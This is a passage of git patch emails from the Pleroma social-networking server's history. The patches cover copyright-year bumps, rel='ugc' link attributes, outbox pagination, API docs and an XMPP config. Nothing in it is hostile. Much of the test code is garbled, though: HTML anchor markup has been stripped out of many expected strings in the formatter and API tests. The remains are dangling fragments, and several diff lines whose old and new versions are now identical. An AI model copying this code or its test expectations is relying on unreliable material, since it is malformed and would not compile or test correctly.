+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.OAuth.TokenTest do
diff --git a/test/web/ostatus/activity_representer_test.exs b/test/web/ostatus/activity_representer_test.exs
index a3a92ce5b..a8d500890 100644
--- a/test/web/ostatus/activity_representer_test.exs
+++ b/test/web/ostatus/activity_representer_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.OStatus.ActivityRepresenterTest do
diff --git a/test/web/ostatus/feed_representer_test.exs b/test/web/ostatus/feed_representer_test.exs
index 3c7b126e7..d1cadf1e4 100644
--- a/test/web/ostatus/feed_representer_test.exs
+++ b/test/web/ostatus/feed_representer_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.OStatus.FeedRepresenterTest do
diff --git a/test/web/ostatus/ostatus_controller_test.exs b/test/web/ostatus/ostatus_controller_test.exs
index 095ae7041..ec96f0012 100644
--- a/test/web/ostatus/ostatus_controller_test.exs
+++ b/test/web/ostatus/ostatus_controller_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.OStatus.OStatusControllerTest do
diff --git a/test/web/ostatus/ostatus_test.exs b/test/web/ostatus/ostatus_test.exs
index 803a97695..f04a5cfc5 100644
--- a/test/web/ostatus/ostatus_test.exs
+++ b/test/web/ostatus/ostatus_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.OStatusTest do
diff --git a/test/web/plugs/federating_plug_test.exs b/test/web/plugs/federating_plug_test.exs
index bb2e1687a..9dcab93da 100644
--- a/test/web/plugs/federating_plug_test.exs
+++ b/test/web/plugs/federating_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.FederatingPlugTest do
diff --git a/test/web/push/impl_test.exs b/test/web/push/impl_test.exs
index e2f89f40a..2f6ce4bd2 100644
--- a/test/web/push/impl_test.exs
+++ b/test/web/push/impl_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.Push.ImplTest do
diff --git a/test/web/salmon/salmon_test.exs b/test/web/salmon/salmon_test.exs
index 0186f3fef..153ec41ac 100644
--- a/test/web/salmon/salmon_test.exs
+++ b/test/web/salmon/salmon_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.Salmon.SalmonTest do
diff --git a/test/web/streamer/streamer_test.exs b/test/web/streamer/streamer_test.exs
index 88847e20f..b8fcd41fa 100644
--- a/test/web/streamer/streamer_test.exs
+++ b/test/web/streamer/streamer_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.StreamerTest do
diff --git a/test/web/twitter_api/twitter_api_test.exs b/test/web/twitter_api/twitter_api_test.exs
index 3c0528776..08f264431 100644
--- a/test/web/twitter_api/twitter_api_test.exs
+++ b/test/web/twitter_api/twitter_api_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.TwitterAPI.TwitterAPITest do
diff --git a/test/web/uploader_controller_test.exs b/test/web/uploader_controller_test.exs
index 70028df1c..7c7f9a6ea 100644
--- a/test/web/uploader_controller_test.exs
+++ b/test/web/uploader_controller_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.UploaderControllerTest do
diff --git a/test/web/views/error_view_test.exs b/test/web/views/error_view_test.exs
index 3857d585f..4e5398c83 100644
--- a/test/web/views/error_view_test.exs
+++ b/test/web/views/error_view_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.ErrorViewTest do
diff --git a/test/web/web_finger/web_finger_controller_test.exs b/test/web/web_finger/web_finger_controller_test.exs
index bd3ccaaf7..49cd1460b 100644
--- a/test/web/web_finger/web_finger_controller_test.exs
+++ b/test/web/web_finger/web_finger_controller_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.WebFinger.WebFingerControllerTest do
diff --git a/test/web/web_finger/web_finger_test.exs b/test/web/web_finger/web_finger_test.exs
index 8fdb9adea..696c1bd70 100644
--- a/test/web/web_finger/web_finger_test.exs
+++ b/test/web/web_finger/web_finger_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.WebFingerTest do
diff --git a/test/web/websub/websub_controller_test.exs b/test/web/websub/websub_controller_test.exs
index 59cacbe68..f6d002b3b 100644
--- a/test/web/websub/websub_controller_test.exs
+++ b/test/web/websub/websub_controller_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.Websub.WebsubControllerTest do
diff --git a/test/web/websub/websub_test.exs b/test/web/websub/websub_test.exs
index 929acf5a2..46ca545de 100644
--- a/test/web/websub/websub_test.exs
+++ b/test/web/websub/websub_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.WebsubTest do
From 3e972c0456a6f556bd1ee9118116f347d774df61 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Thu, 19 Sep 2019 00:21:16 +0300
Subject: [PATCH 180/272] Add :shared_pack_cache_seconds_per_file to
description.exs
---
config/description.exs | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/config/description.exs b/config/description.exs
index 65ea6bf01..5dc8dc364 100644
--- a/config/description.exs
+++ b/config/description.exs
@@ -2256,6 +2256,14 @@
"Location of the JSON-manifest. This manifest contains information about the emoji-packs you can download." <>
" Currently only one manifest can be added (no arrays)",
suggestions: ["https://git.pleroma.social/pleroma/emoji-index/raw/master/index.json"]
+ },
+ %{
+ key: :shared_pack_cache_seconds_per_file,
+ type: :integer,
+ descpiption:
+ "When an emoji pack is shared, the archive is created and cached in memory" <>
+ " for this amount of seconds multiplied by the number of files.",
+ suggestions: [60]
}
]
},
From fe5e0b784604b1352e98e7915c3c67d59ac4f709 Mon Sep 17 00:00:00 2001
From: eugenijm
Date: Thu, 19 Sep 2019 08:27:55 +0300
Subject: [PATCH 181/272] Mastodon API: Return `pleroma.direct_conversation_id`
when creating direct messages (`POST /api/v1/statuses`)
---
CHANGELOG.md | 1 +
.../mastodon_api/controllers/mastodon_api_controller.ex | 7 ++++++-
test/web/mastodon_api/mastodon_api_controller_test.exs | 4 +++-
3 files changed, 10 insertions(+), 2 deletions(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 906aa985e..84b64e2b9 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -11,6 +11,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) and `Pleroma.Web.Federator.RetryQueue` with [Oban](https://github.com/sorentwo/oban) (see [`docs/config.md`](docs/config.md) on migrating customized worker / retry settings)
- Introduced [quantum](https://github.com/quantum-elixir/quantum-core) job scheduler
- Admin API: Return `total` when querying for reports
+- Mastodon API: Return `pleroma.direct_conversation_id` when creating a direct message (`POST /api/v1/statuses`)
## [1.1.0] - 2019-??-??
### Security
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index 37eeb2ac3..6704ee7e8 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -611,7 +611,12 @@ def post_status(%{assigns: %{user: user}} = conn, %{"status" => _} = params) do
{:ok, activity} ->
conn
|> put_view(StatusView)
- |> try_render("status.json", %{activity: activity, for: user, as: :activity})
+ |> try_render("status.json", %{
+ activity: activity,
+ for: user,
+ as: :activity,
+ with_direct_conversation_id: true
+ })
end
end
end
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index fb04748bb..35a0d3fe1 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -296,7 +296,9 @@ test "posting a direct status", %{conn: conn} do
conn
|> post("api/v1/statuses", %{"status" => content, "visibility" => "direct"})
- assert %{"id" => id, "visibility" => "direct"} = json_response(conn, 200)
+ assert %{"id" => id} = response = json_response(conn, 200)
+ assert response["visibility"] == "direct"
+ assert response["pleroma"]["direct_conversation_id"]
assert activity = Activity.get_by_id(id)
assert activity.recipients == [user2.ap_id, conn.assigns[:user].ap_id]
assert activity.data["to"] == [user2.ap_id]
From cf3041220a7a14dc3fac24177fac1f4aecc77f5f Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Tue, 17 Sep 2019 15:22:46 +0700
Subject: [PATCH 182/272] Add support for `rel="ugc"`
---
config/config.exs | 2 +-
config/description.exs | 2 +-
docs/config.md | 2 +-
lib/pleroma/html.ex | 6 +++--
test/formatter_test.exs | 24 ++++++++++---------
test/web/common_api/common_api_utils_test.exs | 6 ++---
.../update_credentials_test.exs | 2 +-
7 files changed, 24 insertions(+), 20 deletions(-)
diff --git a/config/config.exs b/config/config.exs
index c7e0cf09f..26dc4d16d 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -507,7 +507,7 @@
class: false,
strip_prefix: false,
new_window: false,
- rel: false
+ rel: "ugc"
]
config :pleroma, :ldap,
diff --git a/config/description.exs b/config/description.exs
index 65ea6bf01..abfb6370f 100644
--- a/config/description.exs
+++ b/config/description.exs
@@ -1900,7 +1900,7 @@
key: :rel,
type: [:string, false],
description: "override the rel attribute. false to clear",
- suggestions: ["noopener noreferrer", false]
+ suggestions: ["ugc", false]
},
%{
key: :new_window,
diff --git a/docs/config.md b/docs/config.md
index 3f37fa561..def462900 100644
--- a/docs/config.md
+++ b/docs/config.md
@@ -521,7 +521,7 @@ config :auto_linker,
class: false,
strip_prefix: false,
new_window: false,
- rel: false
+ rel: "ugc"
]
```
diff --git a/lib/pleroma/html.ex b/lib/pleroma/html.ex
index 3951f0f51..937bafed5 100644
--- a/lib/pleroma/html.ex
+++ b/lib/pleroma/html.ex
@@ -184,7 +184,8 @@ defmodule Pleroma.HTML.Scrubber.Default do
"tag",
"nofollow",
"noopener",
- "noreferrer"
+ "noreferrer",
+ "ugc"
])
Meta.allow_tag_with_these_attributes("a", ["name", "title"])
@@ -304,7 +305,8 @@ defmodule Pleroma.HTML.Scrubber.LinksOnly do
"nofollow",
"noopener",
"noreferrer",
- "me"
+ "me",
+ "ugc"
])
Meta.allow_tag_with_these_attributes("a", ["name", "title"])
diff --git a/test/formatter_test.exs b/test/formatter_test.exs
index c443dfe7c..3674577d6 100644
--- a/test/formatter_test.exs
+++ b/test/formatter_test.exs
@@ -39,21 +39,21 @@ test "turning urls into links" do
text = "Hey, check out https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla ."
expected =
- "Hey, check out https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla ."
+ ~S(Hey, check out https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla .)
assert {^expected, [], []} = Formatter.linkify(text)
text = "https://mastodon.social/@lambadalambda"
expected =
- "https://mastodon.social/@lambadalambda"
+ ~S(https://mastodon.social/@lambadalambda)
assert {^expected, [], []} = Formatter.linkify(text)
text = "https://mastodon.social:4000/@lambadalambda"
expected =
- "https://mastodon.social:4000/@lambadalambda"
+ ~S(https://mastodon.social:4000/@lambadalambda)
assert {^expected, [], []} = Formatter.linkify(text)
@@ -63,55 +63,57 @@ test "turning urls into links" do
assert {^expected, [], []} = Formatter.linkify(text)
text = "http://www.cs.vu.nl/~ast/intel/"
- expected = "http://www.cs.vu.nl/~ast/intel/"
+
+ expected =
+ ~S(http://www.cs.vu.nl/~ast/intel/)
assert {^expected, [], []} = Formatter.linkify(text)
text = "https://forum.zdoom.org/viewtopic.php?f=44&t=57087"
expected =
- "https://forum.zdoom.org/viewtopic.php?f=44&t=57087"
+ "https://forum.zdoom.org/viewtopic.php?f=44&t=57087"
assert {^expected, [], []} = Formatter.linkify(text)
text = "https://en.wikipedia.org/wiki/Sophia_(Gnosticism)#Mythos_of_the_soul"
expected =
- "https://en.wikipedia.org/wiki/Sophia_(Gnosticism)#Mythos_of_the_soul"
+ "https://en.wikipedia.org/wiki/Sophia_(Gnosticism)#Mythos_of_the_soul"
assert {^expected, [], []} = Formatter.linkify(text)
text = "https://www.google.co.jp/search?q=Nasim+Aghdam"
expected =
- "https://www.google.co.jp/search?q=Nasim+Aghdam"
+ "https://www.google.co.jp/search?q=Nasim+Aghdam"
assert {^expected, [], []} = Formatter.linkify(text)
text = "https://en.wikipedia.org/wiki/Duff's_device"
expected =
- "https://en.wikipedia.org/wiki/Duff's_device"
+ "https://en.wikipedia.org/wiki/Duff's_device"
assert {^expected, [], []} = Formatter.linkify(text)
text = "https://pleroma.com https://pleroma.com/sucks"
expected =
- "https://pleroma.com https://pleroma.com/sucks"
+ "https://pleroma.com https://pleroma.com/sucks"
assert {^expected, [], []} = Formatter.linkify(text)
text = "xmpp:contact@hacktivis.me"
- expected = "xmpp:contact@hacktivis.me"
+ expected = "xmpp:contact@hacktivis.me"
assert {^expected, [], []} = Formatter.linkify(text)
text =
"magnet:?xt=urn:btih:7ec9d298e91d6e4394d1379caf073c77ff3e3136&tr=udp%3A%2F%2Fopentor.org%3A2710&tr=udp%3A%2F%2Ftracker.blackunicorn.xyz%3A6969&tr=udp%3A%2F%2Ftracker.ccc.de%3A80&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=wss%3A%2F%2Ftracker.btorrent.xyz&tr=wss%3A%2F%2Ftracker.fastcast.nz&tr=wss%3A%2F%2Ftracker.openwebtorrent.com"
- expected = "#{text}"
+ expected = "#{text}"
assert {^expected, [], []} = Formatter.linkify(text)
end
diff --git a/test/web/common_api/common_api_utils_test.exs b/test/web/common_api/common_api_utils_test.exs
index 230146451..78cfe3c5f 100644
--- a/test/web/common_api/common_api_utils_test.exs
+++ b/test/web/common_api/common_api_utils_test.exs
@@ -157,11 +157,11 @@ test "works for text/markdown with mentions" do
text = "**hello world**\n\n*another @user__test and @user__test google.com paragraph*"
expected =
- "hello world
\nanother hello world
\nanother @user__test and @user__test and @user__test google.com paragraph
\n"
+ }" class="u-url mention" href="http://foo.com/user__test">@user__test google.com paragraph
\n)
{output, _, _} = Utils.format_input(text, "text/markdown")
diff --git a/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs b/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs
index 89d4ca37e..1e8d0d03b 100644
--- a/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs
+++ b/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs
@@ -334,7 +334,7 @@ test "update fields", %{conn: conn} do
assert account["fields"] == [
%{"name" => "foo", "value" => "bar"},
- %{"name" => "link", "value" => "cofe.io"}
+ %{"name" => "link", "value" => ~S(cofe.io)}
]
assert account["source"]["fields"] == [
From d639cdcecb1b9cd2326b98c926dff8b0f4c27e3c Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Thu, 19 Sep 2019 14:04:13 +0700
Subject: [PATCH 183/272] Update "config/description.exs"
---
config/description.exs | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/config/description.exs b/config/description.exs
index abfb6370f..510e285df 100644
--- a/config/description.exs
+++ b/config/description.exs
@@ -1900,7 +1900,7 @@
key: :rel,
type: [:string, false],
description: "override the rel attribute. false to clear",
- suggestions: ["ugc", false]
+ suggestions: ["ugc", "noopener noreferrer", false]
},
%{
key: :new_window,
From 95c948110ca130559fd6a5302011aa58900274ac Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Thu, 19 Sep 2019 14:39:52 +0700
Subject: [PATCH 184/272] Add `rel="ugc"` to hashtags and mentions
---
lib/pleroma/formatter.ex | 6 ++--
test/formatter_test.exs | 30 +++++++++++--------
test/user_test.exs | 4 +--
test/web/common_api/common_api_utils_test.exs | 4 +--
.../update_credentials_test.exs | 7 ++---
.../mastodon_api_controller_test.exs | 8 ++---
test/web/twitter_api/twitter_api_test.exs | 4 ++-
7 files changed, 35 insertions(+), 28 deletions(-)
diff --git a/lib/pleroma/formatter.ex b/lib/pleroma/formatter.ex
index 607843a5b..23a5ac8fe 100644
--- a/lib/pleroma/formatter.ex
+++ b/lib/pleroma/formatter.ex
@@ -36,9 +36,9 @@ def mention_handler("@" <> nickname, buffer, opts, acc) do
nickname_text = get_nickname_text(nickname, opts)
link =
- "@#{
+ ~s(@#{
nickname_text
- }"
+ })
{link, %{acc | mentions: MapSet.put(acc.mentions, {"@" <> nickname, user})}}
@@ -50,7 +50,7 @@ def mention_handler("@" <> nickname, buffer, opts, acc) do
def hashtag_handler("#" <> tag = tag_text, _buffer, _opts, acc) do
tag = String.downcase(tag)
url = "#{Pleroma.Web.base_url()}/tag/#{tag}"
- link = "#{tag_text}"
+ link = ~s(#{tag_text})
{link, %{acc | tags: MapSet.put(acc.tags, {tag_text, tag})}}
end
diff --git a/test/formatter_test.exs b/test/formatter_test.exs
index 3674577d6..2e4280fc2 100644
--- a/test/formatter_test.exs
+++ b/test/formatter_test.exs
@@ -19,7 +19,7 @@ test "turns hashtags into links" do
text = "I love #cofe and #2hu"
expected_text =
- "I love #cofe and #2hu"
+ ~s(I love #cofe and #2hu)
assert {^expected_text, [], _tags} = Formatter.linkify(text)
end
@@ -28,7 +28,7 @@ test "does not turn html characters to tags" do
text = "#fact_3: pleroma does what mastodon't"
expected_text =
- "#fact_3: pleroma does what mastodon't"
+ ~s(#fact_3: pleroma does what mastodon't)
assert {^expected_text, [], _tags} = Formatter.linkify(text)
end
@@ -137,13 +137,13 @@ test "gives a replacement for user links, using local nicknames in user links te
assert length(mentions) == 3
expected_text =
- "@gsimg According to @archa_eme_, that is @daggsy. Also hello @archaeme"
+ }" class="u-url mention" href="#{archaeme_remote.ap_id}" rel="ugc">@archaeme)
assert expected_text == text
end
@@ -158,7 +158,9 @@ test "gives a replacement for user links when the user is using Osada" do
assert length(mentions) == 1
expected_text =
- "@mike test"
+ ~s(@mike test)
assert expected_text == text
end
@@ -172,7 +174,7 @@ test "gives a replacement for single-character local nicknames" do
assert length(mentions) == 1
expected_text =
- "@o hi"
+ ~s(@o hi)
assert expected_text == text
end
@@ -194,13 +196,17 @@ test "given the 'safe_mention' option, it will only mention people in the beginn
assert mentions == [{"@#{user.nickname}", user}, {"@#{other_user.nickname}", other_user}]
assert expected_text ==
- "@#{user.nickname} @#{other_user.nickname} hey dudes i hate @#{third_user.nickname}"
+ }" class="u-url mention" href="#{third_user.ap_id}" rel="ugc">@#{
+ third_user.nickname
+ })
end
test "given the 'safe_mention' option, it will still work without any mention" do
diff --git a/test/user_test.exs b/test/user_test.exs
index 39ba69668..6852fcd40 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -1294,9 +1294,9 @@ test "preserves hosts in user links text" do
bio = "A.k.a. @nick@domain.com"
expected_text =
- "A.k.a. @nick@domain.com"
+ }" rel="ugc">@nick@domain.com)
assert expected_text == User.parse_bio(bio, user)
end
diff --git a/test/web/common_api/common_api_utils_test.exs b/test/web/common_api/common_api_utils_test.exs
index 78cfe3c5f..2588898d0 100644
--- a/test/web/common_api/common_api_utils_test.exs
+++ b/test/web/common_api/common_api_utils_test.exs
@@ -159,9 +159,9 @@ test "works for text/markdown with mentions" do
expected =
~s(hello world
\nanother @user__test and @user__test and @user__test google.com paragraph
\n)
+ }" class="u-url mention" href="http://foo.com/user__test" rel="ugc">@user__test google.com paragraph\n)
{output, _, _} = Utils.format_input(text, "text/markdown")
diff --git a/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs b/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs
index 1e8d0d03b..560f55137 100644
--- a/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs
+++ b/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs
@@ -86,10 +86,9 @@ test "updates the user's bio", %{conn: conn} do
assert user = json_response(conn, 200)
assert user["note"] ==
- ~s(I drink #cofe with @) <> user2.nickname <> ~s()
+ ~s(I drink #cofe with @#{user2.nickname})
end
test "updates the user's locking status", %{conn: conn} do
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index fb04748bb..b85f3e758 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -996,9 +996,9 @@ test "list of notifications", %{conn: conn} do
|> get("/api/v1/notifications")
expected_response =
- "hi @#{user.nickname}"
+ }" rel="ugc">@#{user.nickname})
assert [%{"status" => %{"content" => response}} | _rest] = json_response(conn, 200)
assert response == expected_response
@@ -1018,9 +1018,9 @@ test "getting a single notification", %{conn: conn} do
|> get("/api/v1/notifications/#{notification.id}")
expected_response =
- "hi @#{user.nickname}"
+ }" rel="ugc">@#{user.nickname})
assert %{"status" => %{"content" => response}} = json_response(conn, 200)
assert response == expected_response
diff --git a/test/web/twitter_api/twitter_api_test.exs b/test/web/twitter_api/twitter_api_test.exs
index 08f264431..bf1e233f5 100644
--- a/test/web/twitter_api/twitter_api_test.exs
+++ b/test/web/twitter_api/twitter_api_test.exs
@@ -109,7 +109,9 @@ test "it registers a new user and parses mentions in the bio" do
{:ok, user2} = TwitterAPI.register_user(data2)
expected_text =
- "@john test"
+ ~s(@john test)
assert user2.bio == expected_text
end
From ae1d371428e16b738b8ec638e411e5e8c1ac4937 Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Thu, 19 Sep 2019 14:53:34 +0700
Subject: [PATCH 185/272] Update CHANGELOG
---
CHANGELOG.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 906aa985e..f84b0ac68 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -38,6 +38,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- AdminAPI: Add "godmode" while fetching user statuses (i.e. admin can see private statuses)
- Improve digest email template
– Pagination: (optional) return `total` alongside with `items` when paginating
+- Add `rel="ugc"` to all links in statuses, to prevent SEO spam
### Fixed
- Following from Osada
From 0e6085da106cb966c340fac2d307d9e8e26e91ed Mon Sep 17 00:00:00 2001
From: D Anzorge
Date: Thu, 19 Sep 2019 16:09:07 +0200
Subject: [PATCH 186/272] Fix pagination in AP outbox.json
---
lib/pleroma/web/activity_pub/views/user_view.ex | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/web/activity_pub/views/user_view.ex b/lib/pleroma/web/activity_pub/views/user_view.ex
index 164b973d0..a2f73e140 100644
--- a/lib/pleroma/web/activity_pub/views/user_view.ex
+++ b/lib/pleroma/web/activity_pub/views/user_view.ex
@@ -227,11 +227,12 @@ def render("outbox.json", %{user: user, max_id: max_qid}) do
activities = ActivityPub.fetch_user_activities(user, nil, params)
+ # this is sorted chronologically, so first activity is the newest (max)
{max_id, min_id, collection} =
if length(activities) > 0 do
{
- Enum.at(Enum.reverse(activities), 0).id,
Enum.at(activities, 0).id,
+ Enum.at(Enum.reverse(activities), 0).id,
Enum.map(activities, fn act ->
{:ok, data} = Transmogrifier.prepare_outgoing(act.data)
data
From 9aca2cc95d0d8886d35be17e5cdd683004b425d9 Mon Sep 17 00:00:00 2001
From: D Anzorge
Date: Thu, 19 Sep 2019 16:09:24 +0200
Subject: [PATCH 187/272] Add test for correct AP outbox pagination
---
.../web/activity_pub/views/user_view_test.exs | 23 +++++++++++++++++++
1 file changed, 23 insertions(+)
diff --git a/test/web/activity_pub/views/user_view_test.exs b/test/web/activity_pub/views/user_view_test.exs
index 2b4a04afd..eda95e3ea 100644
--- a/test/web/activity_pub/views/user_view_test.exs
+++ b/test/web/activity_pub/views/user_view_test.exs
@@ -142,4 +142,27 @@ test "sets correct totalItems when follows are hidden but the follow counter is
assert %{"totalItems" => 1} = UserView.render("following.json", %{user: user})
end
end
+
+ test "outbox paginates correctly" do
+ user = insert(:user)
+
+ posts =
+ for i <- 0..25 do
+ {:ok, activity} = CommonAPI.post(user, %{"status" => "post #{i}"})
+ activity
+ end
+
+ # outbox sorts chronologically, newest first, with ten per page
+ posts = Enum.reverse(posts)
+
+ %{"first" => %{"next" => next_url}} =
+ UserView.render("outbox.json", %{user: user, max_id: nil})
+
+ next_id = Enum.at(posts, 9).id
+ assert next_url =~ next_id
+
+ %{"next" => next_url} = UserView.render("outbox.json", %{user: user, max_id: next_id})
+ next_id = Enum.at(posts, 19).id
+ assert next_url =~ next_id
+ end
end
From fe4db3b94e71bafb913044de543472764671cd1a Mon Sep 17 00:00:00 2001
From: lain
Date: Thu, 19 Sep 2019 21:01:05 +0200
Subject: [PATCH 188/272] API Docs: Document conversation ids.
---
docs/api/differences_in_mastoapi_responses.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/docs/api/differences_in_mastoapi_responses.md b/docs/api/differences_in_mastoapi_responses.md
index 3c7f5dad7..d007a69c3 100644
--- a/docs/api/differences_in_mastoapi_responses.md
+++ b/docs/api/differences_in_mastoapi_responses.md
@@ -21,7 +21,8 @@ Adding the parameter `with_muted=true` to the timeline queries will also return
Has these additional fields under the `pleroma` object:
- `local`: true if the post was made on the local instance
-- `conversation_id`: the ID of the conversation the status is associated with (if any)
+- `conversation_id`: the ID of the AP context the status is associated with (if any)
+- `direct_conversation_id`: the ID of the Mastodon direct message conversation the status is associated with (if any)
- `in_reply_to_account_acct`: the `acct` property of User entity for replied user (if any)
- `content`: a map consisting of alternate representations of the `content` property with the key being it's mimetype. Currently the only alternate representation supported is `text/plain`
- `spoiler_text`: a map consisting of alternate representations of the `spoiler_text` property with the key being it's mimetype. Currently the only alternate representation supported is `text/plain`
From df3feb9412f1a6b9962aa5ad4a45e73aabc486d7 Mon Sep 17 00:00:00 2001
From: feld
Date: Fri, 20 Sep 2019 13:21:07 +0000
Subject: [PATCH 189/272] Make it obvious how to support dual stack for
MongooseIM
---
installation/pleroma-mongooseim.cfg | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/installation/pleroma-mongooseim.cfg b/installation/pleroma-mongooseim.cfg
index d7567321f..576f83541 100755
--- a/installation/pleroma-mongooseim.cfg
+++ b/installation/pleroma-mongooseim.cfg
@@ -215,7 +215,9 @@
]}
]},
- { 5222, ejabberd_c2s, [
+ %% If you want dual stack, you have to clone this entire config stanza
+ %% and change the bind to "::"
+ { {5222, "0.0.0.0"}, ejabberd_c2s, [
%%
%% If TLS is compiled in and you installed a SSL
@@ -246,7 +248,9 @@
%% {max_stanza_size, 65536}
%% ]},
- { 5269, ejabberd_s2s_in, [
+ %% If you want dual stack, you have to clone this entire config stanza
+ %% and change the bind to "::"
+ { {5269, "0.0.0.0"}, ejabberd_s2s_in, [
{shaper, s2s_shaper},
{max_stanza_size, 131072},
{protocol_options, ["no_sslv3"]}
From 7cf125245512eb49a118535eda52ddbdd0c4c6bf Mon Sep 17 00:00:00 2001
From: eugenijm
Date: Fri, 20 Sep 2019 17:54:38 +0300
Subject: [PATCH 190/272] Mastodon API: Fix private and direct statuses not
